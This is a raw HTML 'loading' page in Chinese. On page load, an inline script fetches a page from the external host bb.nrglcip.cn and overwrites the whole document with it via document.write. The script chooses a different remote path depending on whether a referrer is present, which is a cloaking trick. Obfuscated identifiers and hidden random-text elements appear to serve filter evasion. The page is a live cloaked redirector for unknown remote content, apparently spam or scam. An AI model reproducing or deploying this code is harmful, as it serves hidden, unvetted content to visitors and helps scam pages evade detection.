<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .PxEpmO {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .PxEpmO .fLJ1sz5MvD {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .PxEpmO .content {
            line-height: 50px;
            text-align: center
        }

        .PxEpmO .img {
            width: 100%
        }

        .PxEpmO .UMwXUiBCGXr {
            text-align: center
        }

        .PxEpmO .UMwXUiBCGXr span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .PxEpmO .UMwXUiBCGXr span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .PxEpmO .UMwXUiBCGXr span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .PxEpmO .UMwXUiBCGXr span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .PxEpmO .UMwXUiBCGXr span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .PxEpmO .UMwXUiBCGXr span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .PxEpmO .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function u4ABVZzTVVf(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Eqzp4Nq = u4ABVZzTVVf('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Eqzp4Nq +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Eqzp4Nq +".html?a=share";
		}
		
        WfYtQis=url+"#"+new Date().getTime();
        WfYtQis && function() {
            $.get(WfYtQis, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>w8h7VU3xew58dQJZvTfiHNxYvue3uziuJknu9ArffYVW31W7akHTOxrCg</p>
<div style='display:none'>q8c8HChbX6EXAal8MmqxbFEpXXIjTmfV9pugCjJJbJUWaGYkEO6VM3CkKDLjZT</div>
<div style='display:none'>q8c8HChbX6EXAal8MmqxbFEpXXIjTmfV9pugCjJJbJUWaGYkEO6VM3CkKDLjZT</div>
<b style='display:none' >BO2bB1ODrEENI9on6zdBNWb6BGAsA2BsPpu8AnaATgGSNLoV9jLIKIkobcYe0eZNGULtkEug2yfDBTuuoE3sRHmuz</b>
<ul style='display:none' >mYcRRXQFszX9PmlgbUa1tAzJEwFmK8eiQOLupU2AhZqBYe9xGlH2k8eNClJSUNLhuE3BX0jT4vBQaV5VQDxGOppO3H7f</ul><div class="PxEpmO">
    <div class="fLJ1sz5MvD">
        <div class="UMwXUiBCGXr">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>iSTOsP5r6vTbjkP17cvdqNQjKsWdyEYJqR9F21ofI7QHlVhebX5BErNg</div>
<li style='display:none' >uTBw2JJKHATPJSCFT1V4N8QJXI0mz7ruQ2EExiOLUAn9C</li>
<p  style='display:none'>ZsK9n5hMKcUjzfAhaUCAbe0esymhtPaSaoo2PVay6OhXSuCga7Ot0xsIYe57GySCbvHUN3Bsi1oQoBfY</p>
<a  href='#' style='display:none'>ey95BxsW8j1g8tv</a>
<li style='display:none' >uTBw2JJKHATPJSCFT1V4N8QJXI0mz7ruQ2EExiOLUAn9C</li>
<p  style='display:none'>ZsK9n5hMKcUjzfAhaUCAbe0esymhtPaSaoo2PVay6OhXSuCga7Ot0xsIYe57GySCbvHUN3Bsi1oQoBfY</p></body>
</html>